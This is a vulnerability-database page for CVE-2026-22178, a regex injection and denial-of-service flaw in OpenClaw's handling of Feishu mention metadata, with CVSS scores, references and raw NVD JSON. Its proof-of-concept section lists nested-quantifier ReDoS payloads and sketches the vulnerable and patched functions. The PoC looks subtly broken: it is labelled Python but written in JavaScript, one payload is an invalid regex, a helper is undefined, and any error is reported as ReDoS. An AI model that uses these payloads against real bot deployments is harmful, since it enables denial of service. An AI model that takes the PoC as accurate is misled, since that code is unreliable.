CVE-2026-22178

Description

OpenClaw versions prior to 2026.2.19 construct RegExp objects directly from unescaped Feishu mention metadata in the stripBotMention function, allowing regex injection and denial of service. Attackers can craft nested-quantifier patterns or metacharacters in mention metadata to trigger catastrophic backtracking, block message processing, or remove unintended content before model processing.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-22178 PoC - Regex Injection via Feishu Mention Metadata
// This PoC demonstrates how malicious mention metadata can trigger ReDoS

// Vulnerable code pattern (stripBotMention function)
function stripBotMention(message) {
    // Extract mention metadata from Feishu message
    const mentionData = extractMentionData(message);
    
    // Directly construct RegExp from unescaped metadata - VULNERABLE!
    const pattern = new RegExp(mentionData.userId, 'gi');
    
    return message.replace(pattern, '');
}

// Malicious payload examples:
const maliciousPayloads = [
    '@user**********',  // Nested quantifiers causing exponential backtracking
    '@user(a+)+a',      // Nested quantifiers with alternation
    '@user(a*)*b',      // Nested quantifiers pattern
    '@user.{100,}',     // Large repetition causing timeout
    '@user(a+){10}',    // Multiple nested quantifiers
];

// Example exploitation:
const payload = '@user(a+)+a';
const startTime = Date.now();
try {
    const result = stripBotMention({
        text: 'Hello ' + payload + ' how are you?',
        mentionData: { userId: payload }
    });
    console.log('Result:', result);
} catch (e) {
    console.log('ReDoS triggered - processing time:', Date.now() - startTime, 'ms');
}

// Fixed code pattern:
function stripBotMentionFixed(message) {
    const mentionData = extractMentionData(message);
    
    // Escape special regex characters before constructing RegExp
    const escapedUserId = mentionData.userId.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
    const pattern = new RegExp(escapedUserId, 'gi');
    
    return message.replace(pattern, '');
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22178
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22178
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22178/
[4] VulDB https://vuldb.com/cve/CVE-2026-22178
[5] https://github.com/openclaw/openclaw/commit/74268489137510b6f6349919d1e197b17290d92c
[6] https://github.com/openclaw/openclaw/commit/7e67ab75cc2f0e93569d12fecd1411c2961fcc8c
[7] https://github.com/openclaw/openclaw/security/advisories/GHSA-c6hr-w26q-c636
[8] https://www.vulncheck.com/advisories/openclaw-redos-and-regex-injection-via-unescaped-feishu-mention-metadata

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22178", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:22.160", "lastModified": "2026-03-19T16:07:51.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.19 construct RegExp objects directly from unescaped Feishu mention metadata in the stripBotMention function, allowing regex injection and denial of service. Attackers can craft nested-quantifier patterns or metacharacters in mention metadata to trigger catastrophic backtracking, block message processing, or remove unintended content before model processing."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.2.19 construyen objetos RegExp directamente a partir de metadatos de menciones de Feishu sin escapar en la función stripBotMention, lo que permite la inyección de expresiones regulares y la denegación de servicio. Los atacantes pueden crear patrones de cuantificadores anidados o metacaracteres en los metadatos de las menciones para desencadenar un retroceso catastrófico, bloquear el procesamiento de mensajes o eliminar contenido no deseado antes del procesamiento del modelo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1333"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.19", "matchCriteriaId": "539A1AE2-E6EC-4FC0-A794-28AA37D76D8E"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/74268489137510b6f6349919d1e197b17290d92c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/commit/7e67ab75cc2f0e93569d12fecd1411c2961fcc8c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c6hr-w26q-c636", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-redos-and-regex-injection-via-unescaped-feishu-mention-metadata", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}